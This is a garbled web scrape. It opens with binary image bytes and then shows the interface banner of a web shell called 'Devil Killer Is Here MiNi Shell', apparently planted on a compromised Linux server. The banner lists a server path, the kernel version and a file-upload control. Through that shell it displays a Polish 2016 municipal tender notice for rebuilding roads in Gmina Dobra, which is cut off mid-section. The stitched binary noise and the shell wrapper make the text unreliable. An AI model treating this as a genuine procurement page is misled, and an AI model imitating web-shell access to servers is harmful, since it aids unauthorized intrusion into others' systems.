JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160824/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160824/302462-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 302462 - 2016
              z dnia 2016-08-24 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Dobra: I.	CZĘŚĆ: PRZEBUDOWA DROGI GMINNEJ W MIEJSCOWOŚCI  DĄBROWICA  DĄBROWICA KOLONIA OD KM 0+000 DO KM 0+500; II.	CZĘŚĆ: PRZEBUDOWA DROGI GMINNEJ W MIEJSCOWOŚCI JANUSZÓWKA ; III.	CZĘŚĆ: PRZEBUDOWA DROGI GMINNEJ WEWNĘTRZNEJ W MIEJSCOWOŚCI RZYMSKO, NA ODCINKU KM 0,700 DO KM 1+000 NA ODCINKU 300 MB<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                tak
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Dobra, krajowy numer identyfikacyjny
              52819000000, ul.
              plac Wojska Polskiego 
              10,
              62730  
              Dobra, woj.
              wielkopolskie, państwo
              , tel.
              0-63 279-90-11, e-mail
              , faks
              0-63 279-90-11.
              <br />
              Adres strony internetowej (URL): http://dobra.nowoczesnagmina.pl/<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>I.	CZĘŚĆ: PRZEBUDOWA DROGI GMINNEJ W MIEJSCOWOŚCI  DĄBROWICA  DĄBROWICA KOLONIA OD KM 0+000 DO KM 0+500; II.	CZĘŚĆ: PRZEBUDOWA DROGI GMINNEJ W MIEJSCOWOŚCI JANUSZÓWKA ; III.	CZĘŚĆ: PRZEBUDOWA DROGI GMINNEJ WEWNĘTRZNEJ W MIEJSCOWOŚCI RZYMSKO, NA ODCINKU KM 0,700 DO KM 1+000 NA ODCINKU 300 MB<br /><b>Numer referencyjny: </b><br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />3<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>PRZEBUDOWA DROGI GMINNEJ W MIEJSCOWOŚCI  DĄBROWICA  DĄBROWICA KOLONIA OD KM 0+000 DO KM 0+500
Zakres robót obejmuje:
I	ROBOTY POMIAROWE
1	Roboty pomiarowe przy liniowych robotach ziemnych - trasa drogi w terenie równinnym- 0,512 km
2	Inwentaryzacja powykonawcza		                                                       -1,000 kpl
II	ODWODNIENIE

3	Przepusty rurowe  - ława fundamentowa betonowa		                                 - 3,60 m3

4	Przepusty rurowe - rury karbowane PP o śr. 80 cm wraz z zasypka i obsypką	-12,00 m

5	Umocnienie skarp kanałów narzutem kamiennym  na betonie		        -   35,00 m2

6	Przepusty rurowe pod zjazdami - ława fundamentowa żwirowa		          -  0,720 m3

7	Przepusty rurowe pod zjazdami - rury PCV o śr. 40 cm		                       -  6,000 m

III. 	PODBUDOWA

8	Mechaniczne profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni 

            w gruncie kat. V-VI		                                                                 - 2315,0 m2

9	Podbudowa z kruszywa łamanego - warstwa górna o grubości po zagęszczeniu 10 cm	
                                 	                                                                -  2263,80 m2

10	Podbudowa z kruszywa łamanego - warstwa górna o grubości po zagęszczeniu 5 cm		                                                                                                                  - 2263,80 m2
IV.	URZĄDZENIA BEZPIECZEŃSTWA RUCHU

11	Słupki do znaków drogowych z rur stalowych o śr. 50 mm		            -4,00 szt.

12	Przymocowanie tablic znaków drogowych zakazu, ostrzegawczych,

             informacyjnych   o powierzchni do       0.3 m2				-4,00 szt.

13	Bariery ochronne stalowe jednostronne o masie  24.0 kg/m  		- 24,00 m
V	NAWIERZCHNIA

14	Nawierzchnia z mieszanek mineralno-bitumicznych grysowo-żwirowych - warstwa 

            ścieralna asfaltowa - grubość po zagęszcz. 5 cm	                                   -2059,00 m2
VI	ZJAZDY

15	Nawierzchnia gruntowa z mieszanek piaszczysto-gliniastych na piaszczystym gruncie rodzimym - grubość warstwy po zagęszczeniu 20 cm	   	                       - 120,00 m2
VII	ROBOTY WYKOŃCZENIOWE

16	Wykonanie poboczy - grubość warstwy po zag. 15cm		          - 768,00 m2
PRZEBUDOWA DROGI GMINNEJ W MIEJSCOWOŚCI JANUSZÓWKA Zakres robót obejmuje

1)	Odcinek o długości 789 mb



I. ROBOTY PRZYGOTOWAWCZE 

1	Roboty pomiarowe przy liniowych robotach ziemnych (drogach), w terenie: równinnym	km	0,789

2	Inwentaryzacja geodezyjna wykonana w dwóch egzemplarzach	szt.	1,000

3	Rozebranie nawierzchni grubości 5 cm z mas mineralno-bitumicznych, wykonane ręcznie - wraz z wywozem i utylizacją gruzu - dowiązanie projektowanej drogi do drogi istniejącej nawierzchni bitumicznej	m2	11,100

4	Mechaniczne karczowanie krzaków i podszycia: gęstych /powyżej 60% powierzchni/ - wraz z utylizacją gałęzi oraz korzeni	ha	0,045

5	Ścinka drzew wraz z karczowaniem pni koparką podsiębierną w gruntach kat. I-II, o średnicy: 46-55 cm /grunt o normalnej wilgotności/ - wraz z zasypaniem dołów materiałem dowiezionym (Po, Pr, Ps) wraz z zakupem i zagęszczaniem warstwami	szt	11,000

6	Ścinka drzew wraz z karczowaniem pni koparką podsiębierną w gruntach kat. I-II, o średnicy: 56-65 cm /grunt o normalnej wilgotności/ - wraz z zasypaniem dołów materiałem dowiezionym (Po, Pr, Ps) wraz z zakupem i zagęszczaniem warstwami	szt	6,000

7	Ścinka drzew wraz z karczowaniem pni koparką podsiębierną w gruntach kat. I-II, o średnicy: 76-100 cm /grunt o normalnej wilgotności/ - wraz z zasypaniem dołów materiałem dowiezionym (Po, Pr, Ps) wraz z zakupem i zagęszczaniem warstwami	szt	6,000

8	Wykopy z załadunkiem ręcznym i transportem urobku na odl.do 1 km samochodem samowyład. do 5 t /kat. I-II/ - wykopy pod rury osłonowe i kanały technologiczne	m3	11,520

9	Układanie w wykopie rur ochronnych typu AROT, o średnicy 110 mm na sieciach teletechnicznych	m	24,000

10	Zasypywanie wykopów o szer. 0,8-2,5 m, o ścianach pionowych, przy głęb.wykopu do 1,5 m, warstwami grub. 20 cm, z zagęszczeniem ręcznym materiałem dowiezionym (Po, Pr) wraz z zakupem materiału	m3	11,520

II. ROBOTY ZIEMNE 

11	Usunięcie warstwy ziemi urodzajnej (humusu), przy grubości warstwy: do 20 cm wraz z wywozem urobku na odl. do 10 km	m2	1420,200

12	Koryta na całej szerokości jezdni, wykonane mechanicznie przy użyciu równiarki, w gruncie kat.II-VI, przy głębokości koryta do 30 cm i zagęszczeniu walcem wibracyjnym, wraz z odwozem urobku na odl. do 10km (40% urobku do wbudowania w nasypy - poszerzenie korony drogi i pobocza)	m2	3440,700

13	Formowanie nasypów warstwami o grub. 20 cm z zagęszczaniem mechanicznym - nasypy z gruntu pozyskanego z koryta	m3	142,900

14	Formowanie nasypów wraz z zagęszczeniem-, korekta niwelety, uzupełnienie i wyrównanie poboczy -grunt dowieziony(Po,Pr,Ps), wraz z zakupem i transportem materiału	m3	398,800

15	Profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni, wykonane w gruncie kat.II-VI mechanicznie - zagęszczanie walcem wibracyjnym	m2	3440,700

III. PODBUDOWY 

16	Warstwy odcinające zagęszczane mechanicznie, przy grubości warstwy piasku(Po, Pr, Ż) po zagęszczeniu 10 cm - warstwa odsączająca	m2	3440,700

17	Podbudowy z kruszywa łamanego 0-31,5mm (melafir,bazalt,granit), przy grubości dolnej warstwy po zagęszczeniu 15 cm	m2	3440,700

IV. NAWIERZCHNIE 

18	Warstwa ścieralna nawierzchni, wykonana z mieszanek mineralno-bitumicznych AC11S dla KR1, przy grubości warstwy po zagęszczeniu 4 cm	m2	3205,000

V. ODWODNIENIE DROGI 

19	Roboty ziemne wykonywane koparkami podsiębiernymi, z transportem urobku samochodami samowyładowczymi na odległość do 1 km, przy pojemności łyżki koparki: 0,40 m3 /grunt kat. I-II/- odbudowa rowu wzdłuż istn. drogi powiatowej na długości 100mb.	m3	45,000

20	Roboty ziemne wykonywane koparkami przedsiębiernymi, z transportem urobku samochodami samowyładowczymi na odległość do 1 km, przy pojemności łyżki koparki: 0,60 m3 /grunt kat. I-II i samochód do 5 t/-wykpoy pod przepusty	m3	14,900

21	Ławy fundamentowe przepustów rurowych pod drogą wykonane z betonu C8/10	m3	3,000

22	Przepusty rurowe pod drogą gminną, wykonane z rur PEHD o średnicy 50 cm	m	30,000

23	Ścianki czołowe przepustów rurowych pod drogą, przy średnicy rur 50 cm z betonu - ścianki prefabrykowane	szt	4,000

24	Zasypywanie wykopów o szer. 0,8-2,5 m, o ścianach pionowych, przy głęb.wykopu do 1,5 m, warstwami grub. 20 cm, z zagęszczeniem ręcznym-grunt dowieziony(Po,Pr,Ps), wraz z zakupem materiału-przepusty pod drogą	m3	42,700



VI. ROBOTY WYKOŃCZENIOWE i ELEMENTY BEZPIECZEŃSTWA 

25	Plantowanie (obrobienie na czysto) powierzchni skarp i korony nasypów, w gruncie: kat. I-III	m2	2367,000

26	Uzupełnienie poboczy miesznką optymalną, grubość w-wy po zagęszczeniu 10 cm wraz z zakupem i dowozem materiału	m2	1578,000

27	Słupki pionowych znaków drogowych z rur stalowych o średnicy 50 mm	     szt	11,000

28	Tablice znaków drogowych zakazu, nakazu, ostrzegawczych i informacyjnych o powierzchni ponad 0,3 m2	szt	12,000



2)	Odcinek 755 mb



1	I. ROBOTY PRZYGOTOWAWCZE - KOD CPV 45100000-8 

1	Roboty pomiarowe przy liniowych robotach ziemnych (drogach), w terenie: równinnym	km	0,755

2	Inwentaryzacja godezyjna wykonana w dwóch egzemplarzach	szt.	1,000

3	Mechaniczne karczowanie krzaków i podszycia: gęstych /powyżej 60% powierzchni/ - wraz z utylizacją gałęzi oraz korzeni	ha	0,030

4	Ścinka drzew wraz z karczowaniem pni koparką podsiębierną w gruntach kat. I-II, o średnicy: 46-55 cm /grunt o normalnej wilgotności/ - wraz z zasypaniem dołów materiałem dowiezionym (Po, Pr, Ps) wraz z zakupem i zagęszczaniem warstwami	szt	9,000

5	Ścinka drzew wraz z karczowaniem pni koparką podsiębierną w gruntach kat. I-II, o średnicy: 56-65 cm /grunt o normalnej wilgotności/ - wraz z zasypaniem dołów materiałem dowiezionym (Po, Pr, Ps) wraz z zakupem i zagęszczaniem warstwami	szt	4,000

6	Ścinka drzew wraz z karczowaniem pni koparką podsiębierną w gruntach kat. I-II, o średnicy: 76-100 cm /grunt o normalnej wilgotności/ - wraz z zasypaniem dołów materiałem dowiezionym (Po, Pr, Ps) wraz z zakupem i zagęszczaniem warstwami	szt	5,000

7	Wykopy z załadunkiem ręcznym i transportem urobku na odl.do 1 km samochodem samowyład. do 5 t /kat. I-II/ - wykopy pod rury osłonowe i kanały technologiczne	m3	14,900

8	Układanie w wykopie rur ochronnych typu AROT, o średnicy 110 mm na sieciach teletechnicznych	m	36,000

9	Zasypywanie wykopów o szer. 0,8-2,5 m, o ścianach pionowych, przy głęb.wykopu do 1,5 m, warstwami grub. 20 cm, z zagęszczeniem ręcznym materiałem dowiezionym (Po, Pr) wraz z zakupem materiału	m3	14,900

2	II. ROBOTY ZIEMNE - KOD CPV 45121006-6

10	Usunięcie warstwy ziemi urodzajnej (humusu), przy grubości warstwy: do 20 cm wraz z wywozem urobku na odl. do 10 km	m2	1132,500

11	Koryta na całej szerokości jezdni, wykonane mechanicznie przy użyciu równiarki, w gruncie kat.II-VI, przy głębokości koryta do 30 cm i zagęszczeniu walcem wibracyjnym, wraz z odwozem urobku na odl. do 10km (40% urobku do wbudowania w nasypy - poszerzenie korony drogi i pobocza)	m2	3246,500

12	Formowanie nasypów warstwami o grub. 20 cm z zagęszczaniem mechanicznym - nasypy z gruntu pozyskanego z koryta	m3	129,800

13	Formowanie nasypów wraz z zagęszczeniem-, korekta niwelety, uzupełnienie i wyrównanie poboczy -grunt dowieziony(Po,Pr,Ps), wraz z zakupem i transportem materiału	m3	365,700

14	Profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni, wykonane w gruncie kat.II-VI mechanicznie - zagęszczanie walcem wibracyjnym	m2	3246,500

3	III. PODBUDOWY - KOD CPV 45233220-7

15	Warstwy odcinające zagęszczane mechanicznie, przy grubości warstwy piasku(Po, Pr, Ż) po zagęszczeniu 10 cm - warstwa odsączająca	m2	3246,500

16	Podbudowy z kruszywa łamanego 0-31,5mm (melafir,bazalt,granit), przy grubości dolnej warstwy po zagęszczeniu 15 cm	m2	3246,500

4	IV. NAWIERZCHNIE - KOD CPV 45233220-7 

17	Warstwa ścieralna nawierzchni, wykonana z mieszanek mineralno-bitumicznych AC11S dla KR1, przy grubości warstwy po zagęszczeniu 4 cm	m2	3020,000

5	V. ROBOTY WYKOŃCZENIOWE i ELEMENTY BEZPIECZEŃSTWA - KOD CPV 452333140-2

18	Plantowanie (obrobienie na czysto) powierzchni skarp i korony nasypów, w gruncie: kat. I-III	m2	2265,000

19	Uzupełnienie poboczy mieszanką optymalną , grubość w-wy po zagęszczeniu 10 cm wraz z zakupem i dowozem materiału	m2	1510,000

20	Bariery ochronne stalowe na łukach  N2W5	m	32,000

21	Zakończenia barier stalowych  N2W5	szt	4,000

22	Słupki pionowych znaków drogowych z rur stalowych o średnicy 50 mm	szt	2,000

23	Tablice znaków drogowych zakazu, nakazu,ostrzegawczych i informacyjnych o powierzchni ponad 0,3 m2	szt	3,000

PRZEBUDOWA DROGI GMINNEJ WEWNĘTRZNEJ W MIEJSCOWOŚCI RZYMSKO, NA ODCINKU KM 0,700 DO KM 1+000 NA ODCINKU 300 MB I. ROBOTY POMIAROWE, PRZYGOTOWAWCZE I ROZBIÓRKOWE 

1	Roboty pomiarowe przy liniowych robotach ziemnych (drogach), w terenie: równinnym - geodezyjne wytyczenie drogi oraz pasa drogowego z zastabilizowaniem punktów		0,370 km

2	Inwentaryzacja powykonawcza (całego przebudowwywanego odcinka )	.	1,000 szt

3	Mechaniczne karczowanie krzaków i podszycia: gęstych		0,080 ha

4	Transport gałęzi wraz z utylizają		37,000 mp

5	Usunięcie warstwy ziemi urodzajnej (humusu),  wraz z załadunkiem i  odwozem humusu na odległość 5 km na  przy grubości warstwy: do 15 cm - ścinka poboczy i skarp korony drogi		655,000 m2

II. ROBOTY ZIEMNE 

6	Wykopy pod rury osłonowe typu AROT wykonane ręcznie	m3	71,040

7	Ułożenie rur osłonowych typu AROT o średnicy 110mm		148,000 mb

8	Zasypanie wykopów pod rury osłonowe typu ARPT wraz z ręcznym zagęszczeniem		71,040 m3

9	Formowanie nasypów   z materiału dowiezionego Po, Pr, ps wraz z zakupem i dowozem materiału , z zagęszczeniem warstwami o grub. 20 cm - uzupełnienie korony drogi		34,000 m3

III. PODBUDOWA 

10	Profilowanie i zagęszczanie istniejącej podbudowy pod warstwy konstrukcyjne nawierzchni - zagęszczanie walcem wibracyjnym		1221,000 m2

11	Wyrównanie istniejącej podbudowy kruszywem łamanym 0-31,5mm, zagęszczanym mechanicznie, przy grubości warstwy po zagęszczeniu do 10 cm - średnia grubość 10 cm		122,100 m3

IV. NAWIERZCHNIA 

12	Warstwa ścieralna nawierzchni, wykonana z betonu asfaltowego KR1 wg PN-EN-13108-1 AC11S, przy grubości warstwy po zagęszczeniu 4 cm		1110,000 m2

V. ROBOTY WYKOŃCZENIOWE 

13	Uzupełnienie poboczy  kruszywem łamanym stabilizowanym mechanicznie ( 0-31,5mm) , wraz z zakupem i dowozem materiału  zagęszczone przy użyciu walca wibracyjnego, grubość w-wy 10 cm 2x0,75m		555,000 m2

14	Słupki pionowych znaków drogowych z rur stalowych o średnicy 60 mm		1,000 szt

15	Tablice znaków drogowych zakazu, nakazu,  ostrzegawczych i informacyjnych

       o powierzchni ponad   0,3 m2	2,000 szt


<br /><br /><b>II.5) Główny kod CPV: </b>45000000-7<br /><b> Dodatkowe kody CPV:</b>45100000-8,
                45200000-9,
                45233224-5,
                45121006-6,
                45233220-7,
                45233220-7,
                45233140-2<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              576380.77<br />
              Waluta:
              <br /><div style="padding-left: 20px">PLN<br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 28/10/2016<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie opisuje sposobu dokonywania oceny spełnienia niniejszego warunku.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Wykonawca posiada potencjał ekonomiczny i finansowy, tj.:

- jest ubezpieczony od odpowiedzialności cywilnej OC na kwotę 200000,00 zł

- posiada środki finansowe lub zdolność kredytową w wysokości minimum 200 000,00 zł<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca dysponuje co najmniej jedną maszyną do układania masy bitumicznej.
Wykonawca dysponuje co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w zakresie budowy dróg.
Wykonawca posiada doświadczenie, tj. w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 3 zadania polegające na układaniu masy asfaltowej o długości minimum 500 m każde.

Wykonawca lub jego personel zarządzający posiada następujące wykształcenie lub kwalifikacje: uprawnienia budowlane do kierowania robotami budowlanymi w zakresie budowy dróg.


<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
